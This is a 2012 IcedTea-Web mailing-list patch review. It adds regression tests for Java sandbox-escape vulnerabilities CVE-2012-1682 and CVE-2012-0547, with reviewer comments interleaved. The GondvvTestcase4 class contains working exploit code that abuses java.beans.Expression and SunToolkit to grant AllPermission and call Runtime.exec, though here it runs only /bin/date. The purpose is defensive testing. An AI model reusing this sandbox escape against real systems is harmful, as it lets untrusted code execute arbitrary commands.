[rfc][icedtea-web] Reproducer of BeansStatement behaviour
Jiri Vanek
jvanek at redhat.com
Mon Dec 17 08:21:30 PST 2012
On 12/14/2012 09:58 PM, Adam Domurad wrote:
> On 12/13/2012 11:35 AM, Jiri Vanek wrote:
>> Ok for head?
>>
>> J.
>
> I'm assuming this is OK for the repo since this has been made public before. To be exact though this
> is testing a property of the JRE.
>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html Mon Sep
>> 03 16:04:41 2012 +0200
>> @@ -0,0 +1,42 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<html><head></head><body bgcolor="blue">
>> +<p><applet code="GondvvMinimal2.class" archive="BeansStatementExploit.jar" codebase="."
>> width="100" height="20">
>> +</applet></p>
>> +</body>
>> +</html>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>
> Maybe 'BeansStatementBreakSandbox' would be a bit clearer.
>
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>> Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,61 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
>> + <information>
>> + <title>BeansStatementExploitApplet</title>
>> + <vendor>IcedTea</vendor>
>> + <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitApplet</description>
>> + <offline/>
>> + </information>
>> + <resources>
>> + <j2se version="1.6+"/>
>> + <jar href="BeansStatementExploit.jar"/>
>> + </resources>
>> + <applet-desc
>> + documentBase="."
>> + name="BeansStatementExploitApplet"
>> + main-class="GondvvMinimal2"
>> + width="100"
>> + height="100">
>> + </applet-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp Mon
>> Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,56 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
>> + <information>
>> + <title>BeansStatementExploitWS</title>
>> + <vendor>IcedTea</vendor>
>> + <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitWS</description>
>> + <offline/>
>> + </information>
>> + <resources>
>> + <j2se version="1.6+"/>
>> + <jar href="BeansStatementExploit.jar"/>
>> + </resources>
>> + <application-desc main-class="GondvvTestcase4">
>> + </application-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java Mon Sep 03 16:04:41
>> 2012 +0200
>> @@ -0,0 +1,49 @@
>> +/* GondvvMinimal2.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.applet.Applet;
>> +
>> +
>> +public class GondvvMinimal2 extends Applet {
>
> I understand why you chose this name, but I would prefer something more descriptive of the intent of
> the applet.
>
>> +
>> + @Override
>> + public void init() {
>> + GondvvTestcase4.main(new String[0]);
>> +
>> + }
>> +
>> +}
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java Mon Sep 03
>> 16:04:41 2012 +0200
>> @@ -0,0 +1,181 @@
>> +/* GondvvTestcase4.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.beans.Statement;
>> +import java.beans.Expression;
>> +
>> +import java.lang.reflect.Field;
>> +import java.net.URL;
>> +import java.security.*;
>> +import java.security.cert.Certificate;
>> +import java.io.InputStreamReader;
>> +import java.io.BufferedReader;
>> +
>> +/**
>> + *
>> + * Summary for @
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
>> + * and
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
>> + */
>> +public class GondvvTestcase4 {
>> +
>> + public static int runproc(Process proc) throws Exception {
>> + BufferedReader cmdout = new BufferedReader(new InputStreamReader(proc.getInputStream()));
>> + String line;
>> + while ((line = cmdout.readLine()) != null) {
>> + System.out.println(line);
>> + }
>> + proc.waitFor();
>> + return proc.exitValue();
>> + }
>> +
>> + public static void runcommand_exploit(String cmd) throws Exception {
>> + Expression exec_ex = new Expression(Runtime.getRuntime(), "exec", new String[]{cmd});
>> +
>> + Permissions perms = new Permissions();
>> + perms.add(new AllPermission());
>> + ProtectionDomain protdomain = new ProtectionDomain(
>> + new CodeSource(new URL("file:///"), new Certificate[0]), perms);
>> + AccessControlContext acc = new AccessControlContext(new ProtectionDomain[]{protdomain});
>> +
>> + Expression tmp_ex = new Expression(Class.class, "forName", new
>> Object[]{"sun.awt.SunToolkit"});
>> + tmp_ex.execute();
>> + Class toolkit = (Class) tmp_ex.getValue();
>> +
>> + tmp_ex = new Expression(toolkit, "getField", new Object[]{Statement.class, "acc"});
>> + tmp_ex.execute();
>> + ((Field) tmp_ex.getValue()).set(exec_ex, acc);
>> + exec_ex.execute();
>> +
>> + runproc((Process) exec_ex.getValue());
>> + }
>> +
>> + public static void runcommand_direct(String cmd) throws Exception {
>> + runproc(Runtime.getRuntime().exec(cmd));
>> + }
>> +
>> + public static void main(String[] args) {
>> + System.out.println("Running GondvvTest");
>> + args = new String[]{"/bin/date"};
>> + try {
>> + System.out.println("Directly calling: Class.forName(\"sun.awt.SunToolkit\")");
>> +
>> + Object cl = Class.forName("sun.awt.SunToolkit");
>> + System.out.println("FAIL: " + cl.toString());
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>
> Can you move the FAIL/OK checks into the testcase class possibly ? I guess its OK as it is, but if
> you can make the testcase do more checking and not just checking for FAIL it would be good.
>
>> + System.out.println();
>> +
>> +
>> + try {
>> + System.out.println("Calling: Expression(Class.class, \"forName\", new
>> String[]{\"sun.awt.SunToolkit\"})");
>> +
>> + Expression ex = new Expression(Class.class, "forName", new
>> String[]{"sun.awt.SunToolkit"});
>> + ex.execute();
>> + Object cl = ex.getValue();
>> + System.out.println("FAIL: " + cl.toString());
>> + System.out.println();
>> + System.out.println("Checking if SunToolkit class reference is usable");
>> + try {
>> + ex = new Expression(cl, "getField", new Object[]{Byte.class, "SIZE"});
>> + ex.execute();
>> + System.out.println("FAIL: " + ex.getValue().toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("INFO: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> +
>> + try {
>> + ex = new Expression(cl, "getField", new Object[]{Statement.class, "acc"});
>> + ex.execute();
>> + System.out.println("FAIL: " + ex.getValue().toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("INFO: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>> +
>> + if (args.length == 0) {
>> + }
>
> ??
>
>> +
>> + try {
>> + System.out.println("Running command directly: " + args[0]);
>> + runcommand_direct(args[0]);
>> + System.out.println("FAIL: commnad was run");
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>> +
>> + try {
>> + System.out.println("Running command using exploit: " + args[0]);
>> + runcommand_exploit(args[0]);
>> + System.out.println("FAIL: commnad was run");
>> + } catch (AccessControlException e) {
>> + System.out.println("OK: got expected: " + e.toString());
>> + } catch (NoSuchMethodException e) {
>> + System.out.println("FAIL: " + e.toString());
>> + e.printStackTrace();
>> + } catch (Exception e) {
>> + System.out.println("FAIL: unexpected exception: " + e.toString());
>> + e.printStackTrace();
>> + }
>> + System.out.println();
>
> Looks OK but again
>
>> +
>> +
>> + }
>> +}
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,82 @@
>> +/* BeansStatementExploitTests.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING. If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library. Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module. An independent module is a module which is not derived from
>> +or based on this library. If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so. If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import net.sourceforge.jnlp.ProcessResult;
>> +import net.sourceforge.jnlp.annotations.Bug;
>> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
>> +import net.sourceforge.jnlp.browsertesting.Browsers;
>> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
>> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
>> +import org.junit.Assert;
>> +
>> +import org.junit.Test;
>> +
>> +public class BeansStatementExploitTests extends BrowserTest {
>> +
>> + @Test
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTestWS() throws Exception {
>> + ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitWS.jnlp");
>> + evaluate(pr);
>> + }
>> +
>> + @Test
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTesWsApplet() throws Exception {
>> + ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitApplet.jnlp");
>> + evaluate(pr);
>> + }
>> +
>> + @Test
>> + @TestInBrowsers(testIn = {Browsers.all})
>> + @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> + public void BeansStatementExploitTestApplet() throws Exception {
>> + ProcessResult pr = server.executeBrowser("/BeansStatementExploit.html");
>> + evaluate(pr);
>> + Assert.assertTrue(pr.wasTerminated);
>> + }
>> +
>> + private void evaluate(ProcessResult pr) {
>> + Assert.assertTrue("Output of reproducerwas empty => it was not run", (pr.stdout.length()
>> > 0));
>> + Assert.assertTrue("Output of reproducerwas have not contained 'Running GondvvTest' => it
>> was not run", (pr.stdout.contains("Running GondvvTest")));
>> + Assert.assertFalse("Output of reproducer contained FAIL, that means that exploit have
>> hacked your system", (pr.stdout.contains("FAIL:")));
>> +
>> + }
>> +}
>
> Looks OK, although this seems like something that is better placed in a JRE's test suite, not ITWs.
> I have no problems with it going in the repo, though.
>
> Happy hacking,
> -Adam
Thank you for review All except FAIL/OK fixed. And for those stdouts I would rather stay with it.
I have added also listeners to speed up closing....
J.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: openjdk-exploit3-reproducer3.diff
Type: text/x-patch
Size: 22176 bytes
Desc: not available
Url : http://mail.openjdk.java.net/pipermail/distro-pkg-dev/attachments/20121217/f4c26741/openjdk-exploit3-reproducer3.diff
More information about the distro-pkg-dev
mailing list